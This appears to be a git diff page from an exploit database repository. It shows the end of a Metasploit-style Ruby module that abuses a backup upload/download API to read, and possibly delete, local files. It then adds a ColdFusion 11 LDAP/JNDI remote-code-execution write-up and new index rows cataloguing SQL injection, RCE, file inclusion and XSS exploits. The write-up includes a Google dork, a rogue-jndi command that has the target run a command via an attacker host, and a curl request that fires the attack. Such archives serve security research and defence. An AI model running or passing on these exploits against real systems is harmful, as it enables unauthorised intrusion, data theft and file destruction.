||||||
|
end
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
|
||||||
|
'vars_get' => {
|
||||||
|
'src' => datastore['LOCAL_FILE_PATH']
|
||||||
|
},
|
||||||
|
'headers' => {
|
||||||
|
'Referer' => referer
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
fail_with(Failure::Unreachable, 'Upload request failed.')
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.code != 200
|
||||||
|
fail_with(Failure::Unknown, res.body)
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.headers['Content-Type'] == 'application/json'
|
||||||
|
json_res = res.get_json_document
|
||||||
|
|
||||||
|
if json_res['success']
|
||||||
|
print_good json_res['success']
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
fail_with(Failure::Unknown, res.body)
|
||||||
|
end
|
||||||
|
|
||||||
|
fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.')
|
||||||
|
end
|
||||||
|
|
||||||
|
def try_download
|
||||||
|
filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
|
||||||
|
print_status 'Downloading ' + filename + ' from the backup folder.'
|
||||||
|
|
||||||
|
referer = ''
|
||||||
|
if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
|
||||||
|
referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
|
||||||
|
else
|
||||||
|
referer = full_uri
|
||||||
|
end
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
|
||||||
|
'vars_get' => {
|
||||||
|
'filename' => filename
|
||||||
|
},
|
||||||
|
'headers' => {
|
||||||
|
'Referer' => referer
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
fail_with(Failure::Unreachable, 'Download request failed.')
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.code != 200
|
||||||
|
fail_with(Failure::Unknown, res.body)
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.headers['Content-Type'] == 'application/json'
|
||||||
|
json_res = res.get_json_document
|
||||||
|
|
||||||
|
if json_res['error']
|
||||||
|
fail_with(Failure::Unknown, json_res['error'])
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status res.body
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
if datastore['DEFANGED_MODE']
|
||||||
|
warning = <<~EOF
|
||||||
|
Triggering this vulnerability may delete the local file if the web service user has the permission.
|
||||||
|
If you want to continue, disable the DEFANGED_MODE.
|
||||||
|
=> set DEFANGED_MODE false
|
||||||
|
EOF
|
||||||
|
|
||||||
|
fail_with(Failure::BadConfig, warning)
|
||||||
|
end
|
||||||
|
|
||||||
|
try_login
|
||||||
|
try_upload
|
||||||
|
try_download
|
||||||
|
end
|
||||||
|
end
|
42
exploits/windows/remote/50781.txt
Normal file
42
exploits/windows/remote/50781.txt
Normal file
|
@ -0,0 +1,42 @@
|
||||||
|
# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
|
||||||
|
# Google Dork: intext:"adobe coldfusion 11"
|
||||||
|
# Date: 2022-22-02
|
||||||
|
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
|
||||||
|
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
|
||||||
|
# Version: Adobe Coldfusion (11.0.03.292866)
|
||||||
|
# Tested on: Microsoft Windows Server & Linux
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
|
||||||
|
# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc
|
||||||
|
|
||||||
|
==================== 1.Setup rogue-jndi Server ====================
|
||||||
|
|
||||||
|
https://github.com/veracode-research/rogue-jndi
|
||||||
|
|
||||||
|
|
||||||
|
==================== 2.Preparing the Attack =======================
|
||||||
|
|
||||||
|
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"
|
||||||
|
|
||||||
|
==================== 3.Launch the Attack ==========================
|
||||||
|
|
||||||
|
|
||||||
|
http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json
|
||||||
|
|
||||||
|
|
||||||
|
curl -i -s -k -X $'GET' \
|
||||||
|
-H $'Host: target' \
|
||||||
|
--data-binary $'\x0d\x0a\x0d\x0a' \
|
||||||
|
$'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'
|
||||||
|
|
||||||
|
|
||||||
|
==================== 4.RCE =======================================
|
||||||
|
|
||||||
|
Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8
|
||||||
|
Can be done by modify the pom.xml as below
|
||||||
|
|
||||||
|
<configuration>
|
||||||
|
<source>7</source>
|
||||||
|
<target>7</target>
|
||||||
|
</configuration>
|
|
@ -18623,6 +18623,8 @@ id,file,description,date,author,type,platform,port
|
||||||
50720,exploits/windows/remote/50720.py,"Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,notcos,remote,windows,
|
50720,exploits/windows/remote/50720.py,"Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,notcos,remote,windows,
|
||||||
50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",1970-01-01,LiquidWorm,remote,hardware,
|
50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
50290,exploits/multiple/remote/50290.as,"Adobe Flash Player - Integer Overflow",1970-01-01,ryujin,remote,multiple,
|
50290,exploits/multiple/remote/50290.as,"Adobe Flash Player - Integer Overflow",1970-01-01,ryujin,remote,multiple,
|
||||||
|
50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows,
|
||||||
|
50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
||||||
|
@ -44847,3 +44849,10 @@ id,file,description,date,author,type,platform,port
|
||||||
50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
|
50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
|
||||||
50774,exploits/php/webapps/50774.txt,"FileCloud 21.2 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Masashi Fujiwara",webapps,php,
|
50774,exploits/php/webapps/50774.txt,"FileCloud 21.2 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Masashi Fujiwara",webapps,php,
|
||||||
50775,exploits/hardware/webapps/50775.txt,"Dbltek GoIP - Local File Inclusion",1970-01-01,"Valtteri Lehtinen",webapps,hardware,
|
50775,exploits/hardware/webapps/50775.txt,"Dbltek GoIP - Local File Inclusion",1970-01-01,"Valtteri Lehtinen",webapps,hardware,
|
||||||
|
50778,exploits/php/webapps/50778.txt,"Simple Real Estate Portal System 1.0 - 'id' SQLi",1970-01-01,Mosaaed,webapps,php,
|
||||||
|
50779,exploits/php/webapps/50779.txt,"Air Cargo Management System v1.0 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
|
||||||
|
50780,exploits/linux/webapps/50780.txt,"aaPanel 6.8.21 - Directory Traversal (Authenticated)",1970-01-01,Ghuliev,webapps,linux,
|
||||||
|
50782,exploits/php/webapps/50782.txt,"Student Record System 1.0 - 'cid' SQLi (Authenticated)",1970-01-01,"Mohd. Anees",webapps,php,
|
||||||
|
50784,exploits/php/webapps/50784.py,"WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
|
||||||
|
50785,exploits/php/webapps/50785.txt,"WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
|
||||||
|
50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue